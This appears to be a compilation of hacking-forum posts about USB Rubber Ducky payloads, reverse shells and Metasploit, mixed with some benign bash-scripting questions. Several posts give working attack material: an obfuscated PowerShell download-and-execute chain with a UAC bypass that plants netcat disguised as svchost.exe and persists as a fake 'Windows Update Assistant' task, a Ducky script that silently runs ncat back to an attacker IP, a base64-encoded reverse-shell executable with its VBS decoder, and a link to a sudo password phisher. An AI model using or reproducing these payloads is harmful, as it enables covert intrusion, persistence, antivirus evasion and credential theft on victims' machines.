Search the Community

Can you make videos on automation in non-rooted android smartphone remotely?? We know, we can write a bash/shell script and send it to someone remotely via link, if he/she clicks on link, the script will automatically execute. Can we do same in non-rooted android smartphone too?? For an instance, can we send a link to someone with a non-rooted android smartphone , if he/she clicks on link, automatically his/her email account will open, automatically a message will be written in email and it will be sent automatically. Is it possible?? I think it is same as rubber ducky

Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.

asmTshell is a exploit pen test application I developed for users using linux such as debian ubuntu or kali OS. This tool allows you to build a reverse shell binary file and can be set to run on any OS be it windows linux or mac. Once the target windows/linux/mac system runs the shell binary they connect to your server giving you full control of the systems command prompt or shell from your server. It works by utilizing a linux asm compiler called "nasm" It takes target asm payload and allows you to customize the payload to your desired IP and port # through a easy GUI. Once configuration is done from GUI it will edit your input to the needed ASM hex strings using a custom python script. After which it will compile your new ASM into your target binary file. To get a server running you can use netcat nc or ncat ncat -lvkp 1344 ncat to accept more than one client connection to server nc -lvp 1344 netcat -lvp 1344 Once target system runs the shell binary they will connect to your server allowing you to control there OS from the shell. **Limitations** "keep in mind that your port or ip should not contain a 0, which could break it. If your IP contains a zero like 192.168.0.1 or your port contains a zero like 80, the build will not work" --Read-- can test using 127.1.1.1 as localhost server IP Download - https://www.dropbox.com/s/0cwhldcqjwvrgo3/asmshell.tar?dl=0 AV scan - https://www.virustotal.com/#/file/253d12fb5ddd6c58e02b5bbe0822012aef3624dae01a95927f148ba1da15a4c5/detection

Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!

Im trying to exploit my rooted galaxy core prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. Im having a bit of trouble getting a shell. Ive got to the point where a session is created, but when i try to interact with the session to get a shelll it just stops and hangs and does nothing. Ive tried different payloads but the same thing happens everytime. It just says interacting with session <ID>, and I cant get any further than that. Any tips or help would be appreciated. And Im also a bit confused on configuring the reverse shell payload. is the LHOST supposed to be my IP or the victims in a reverse shell. plus what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort? Thank you.

Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of; Using WLAN# up and WLAN# down Disabling USB ports using Hub-CTRL Using hardware add-ons This or this (unknown what is being done here) Even people saying it's not possible. What would you suggest? Has anyone else had any luck with switching off and back on an Alfa Wifi Card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.

Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!

I would just like to preface by saying that I won't be here to read or respond to comments. I apologize for that, but I am spending as much time as I can focusing on research and learning everything I can. This is a time I would consider to be my intellectual prime and I really want to use this time as best I can in that regard, so I hope you can understand why I won't be actively engaging as a user in general. https://medium.com/@ViGrey/phishing-for-root-using-shell-functions-against-mac-and-linux-2b1b7edbb9a9 This is a script that pretends to be sudo and /usr/bin/sudo, acts like the password prompt, steals the password and deletes traces of itself, including the shell history of running the script itself. The specific ducky script in this post is for Ubuntu with Unity, but it could easily be tweaked to work with other desktops, distros, and even Mac OS X. The idea for this came when I was in the early stages of the research project I'm currently working on involving U2F security tokens (I'll make a post here about that later after I get a POC and blog post up). After testing out some commands for the project, the thought "Could I alias sudo?" came to mind and I decided to try it. Sure enough, it worked flawlessly. I then checked to see if I could alias sudo and call sudo at the end, essentially injecting commands into sudo. That worked flawlessly as well. Figuring these things out opened more questions and I ended up in a rabbit hole thinking about what I could do with it. After getting some other work done, I decided to start working on the ideas about 2 or 3 days ago after figuring out the same can be said about shell functions as aliases and came up with this. The ducky script is in the blog post, but also at https://gist.github.com/ViGrey/a988c76c87898a2156da7724c57f16b4#file-rootphisher-ducky. Go ahead and tinker with it; make it better. I know there are probably better ways to handle some edge cases that can arise, but I leave that as a exercise for you all and possibly myself in the future to look at. I just had fun working on this. Apologies for any confusing parts or spelling errors in the blog post. I wrote that post in a bit of a rush so I could get back to my current research project. Have fun with it!

Hi all, I have multiple wireless devices connected to one computer and I'm trying to create a BASH script to find the LogicalName of one of them automatically. For example, I have WLAN0, WLAN1 and WLAN2 connected. I want to find the LogicalName for my 'Super Awesome WiFi Thingy'. So far I have been unable to find a line of BASH that will take the Device Name 'Super Awesome WiFi Thingy' and find which WLAN LogicalName it belongs to. Any ideas? *Edit* I need to output to a variable in format 'WLAN#', rather than just display a list of devices. Thank you.

Here is the file - https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=dns-remoteshell.pcap And a screenshot - http://i64.tinypic.com/6gwu2v.jpg I have to analyse this file and answer several questions about it, like, small description of the events and weather this shows an attack, but I'm new to Wireshark so I'm a bit lost. If anyone could have a look and get back to me that would be great!

I created a shell script to help manage my ducky scripts and to copy what i wanted to use to the root of the drive. After creating it, i wanted to post it just incase anyone else might find it useful and came across this thread. I made this shell script on a mac, and also tested it out on another linux based box and didn’t have any problems. The only thing I had to do on the mac was download the “dialog” command via brew. Currently my SD card contains the following directory structure: As you can see, some of these scripts are from the repository. The Directories are the same name as the script, each directory has the script and the compiled version of the script ready for the duck. When i put in the SD card, i run the menu.sh to bring up the “script manager” what is does is just read the contents of the directory structure and puts it in a menu. I find the one i want and hit enter and it will copy it to the root drive and the script exits. if the inject.bin does not exist where the script is located at, then it will compile it. A lot of the top vars can be changed if you need to. I mostly created it based on how i run and manage the scripts. GitHub for DuckMenu Source: #!/bin/bash #ducky_menu.sh #Version: 1.0.5 #by JM MainFile="inject.bin"; #the compiled file for the rubber ducky CurrentPath=$PWD; #The path of were the menu.sh was ran, this can be hardcoded if needed ScriptsPath="$CurrentPath/scripts"; #path of where the scripts are at, usually a sub folder of the current EncoderPath="$CurrentPath/Encoder/encoder.jar"; #location of the encoder MakeDirMoveFiles=true; #if you have the code in the scripts director and what it to be in it's own directory ScriptExt="txt"; #the extenstion of the script PathName=""; #global var, leave blank choices=""; #global var, leave blank MakeDirFromFiles() { cd $ScriptsPath for file in *.$ScriptExt; do mkdir -- "${file%.$ScriptExt}"; mv -- "$file" "${file%.$ScriptExt}"; done cd $CurrentPath } DoCopy() { cpFrom="$ScriptsPath/${PathName[@]}/$MainFile" cpTo="$CurrentPath/$MainFile" cp "$cpFrom" "$cpTo" dialog --title 'File Copied' --msgbox "$cpFrom was copied to $enTo" 6 60 } RunEncoder() { enFrom="$ScriptsPath/${PathName[@]}/${PathName[@]}.$ScriptExt" enTo="$CurrentPath/$MainFile" java -jar $EncoderPath -i "$enFrom" -o $enTo dialog --title 'File Compiled' --msgbox "$cpFrom was comiled to $enTo" 8 60 } DoMenu() { i=0 x=1 while read line do array[ $i ]="$line" if [[ -n "$options" ]]; then options=("${options[@]}" "$x" "\"$line\"" "off") else options=("$x" "\"$line\"" "off") fi (( i++ )) (( x++ )) done < <(ls $ScriptsPath) cmd=(dialog --separate-output --checklist "Select options:" 22 76 16) choices=$("${cmd[@]}" "${options[@]}" 2>&1 >/dev/tty) if [ -z "$choices"] ; then choices=0 fi if (($choices > 0)) ; then arrayID=`expr $choices - 1` PathName="${array[$arrayID]}" if [ -f "$ScriptsPath/$PathName/$MainFile" ]; then DoCopy $PathName else RunEncoder $PathName fi clear echo "Good Bye Happy Ducking!" else clear echo "No Options selected..Good Bye!" fi } if $MakeDirMoveFiles ; then MakeDirFromFiles; fi DoMenu;

Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.

i was wondering if these are possible serial headers. I'm trying to hopefully get a shell from this. and how would i communicate with these do i use any TTL adapter are does it have to be specific. also what it an easy way to identify the headers TX,RX,VCC,GND...? I'm a beginner so please give me some tips. Images: Device: NetComm NB6Plus4Wn I'm a beginner at this so please give me some tips too. :)

I wrote a few shell (bash?) scripts to simplify some of my tasks in my Kali and Ubuntu Live discs. These were saved as .sh files that could be run when I double-clicked them. I am in the process of writing others for other repetitive tasks Now that I have updated to Kali 2.0, I cannot run these by double-clicking them. Setting them to run in "Run application" returns a message that says: "unable to locate program" I have just written a program called script.sh: #!/bin/bash/ echo "Hello World" And this one has the same difficulties. They all run in terminal with "sh script.sh", but that defeats their simplicity. The same problem happens in Kali and Ubuntu, so I don't think it is a Kali 2.0 issue, but it is the first place I noticed the issue. Permissions are set to run as programs, and the properties tab is checked for "Allow executing file as a program."

Is there a way in Linux to search for all files that are set to execute as root? If so, what would be the command? Thanks

Hi, I was wondering if there would be any solution to log all shell commands on the mark v? I usually use the trap command for that purpose but it seems not to be available even on opkg. Any idea? Thanks

Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!) So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging. After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs. So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all. For this attack , we download a copy of ncat on the victims machine and run it silently. You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here. ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background. The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (Picked up by norton though , sucks i know) VirusTotal netcat results Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window. - GrimsouL REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target. DELAY 1000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed. DELAY 1000 STRING a DELAY 200 REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it ENTER REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 700 REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe') ENTER REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB) DELAY 10000 ENTER REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background , we use a powershell argument to make it so. STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe' ENTER REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway STRING exit ENTER To run our listener on the attacker machine

I'm trying to parse the output of wash for automation. Here is what I have been playing aroung with *This is only part of the script I have it in a shell script that has been set as a boot mode. No matter how long wash runs as a daemon, I only get the start of wash in the log. If I manually execute wash as a daemon, It often does not work, sames results using wlan1 Side Note: I make sure the interface is up and in monitor mode before trying wash. Any help/ideas for achieving the parsing of wash would be great. I'm open to using anything other than bash aswell.

I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!

Guys, I take no credit for this payload.... I just took an already working payload and made some minor tweeks (the way the command prompt is opened) to make more it reliable for my personal use. The original code can be found here; https://securepla.net/download/ducky.txt DELAY 600 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 172.16.1.7 4444 ENTER STRING exit ENTER

Hey everyone! I tried the Reverse Shell payload on a computer running Windows 7 x64 and Kaspersky 2012. Everything was going well up until the binary was compiled. Kaspersky was able to detect it and clean it!! Anyone else run into this issue?